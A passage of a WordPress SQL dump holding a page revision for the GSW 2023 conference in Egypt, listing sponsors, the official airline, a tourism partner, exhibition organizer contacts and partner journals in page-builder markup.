00:23:15','',3066,'https://gsw2023.com/?p=5245',0,'revision','',0),
(5246,1,'2023-08-16 00:24:10','2023-08-16 00:24:10','<p>[vc_row css=\".vc_custom_1692141164274{margin-top: -50px !important;}\"][vc_column][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #0000ff;\"><strong>Under the Auspices of </strong></span><br />\n<span style=\"font-size: 24pt; color: #0000ff;\"><strong>H.E. Professor Mostafa Madbouly,</strong></span><br />\n<span style=\"font-size: 24pt; color: #0000ff;\"><strong>Prime Minister of the Arab Republic of Egypt</strong></span></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_separator style=\"shadow\" border_width=\"10\"][vc_row][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><strong><span style=\"font-size: 24pt;\">Prime Sponsors</span></strong></h4>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141338959{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141365647{margin-top: 35px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141399321{margin-top: 45px !important;}\"]<a href=\"https://www.mbrsc.ae/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5093 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/MBRSC-LOGO_1-01-300x149.png\" alt=\"\" width=\"300\" height=\"149\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141414655{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a></p>\n<p>&nbsp;</p>\n<p style=\"text-align: left;\">[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_column_text]</p>\n<h6 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Platinum Sponsors</strong></span></h6>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144968858{margin-top: 20px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a></p>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144942219{margin-top: -100px !important;}\"][vc_row][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<p style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #000000;\"><strong>Gold </strong></span><span style=\"color: #000000;\"><strong> Sponsors</strong></span></span></p>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145343386{margin-top: -130px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145065578{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong>Gold Sponsors</strong></span></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690460056235{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span><br />\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\n<h1 style=\"text-align: center;\">Journals partner</h1>\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\n<h3></h3>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690460056235{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span><br />\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\n<h1 style=\"text-align: center;\">Journals partner</h1>\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\n<h3></h3>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" 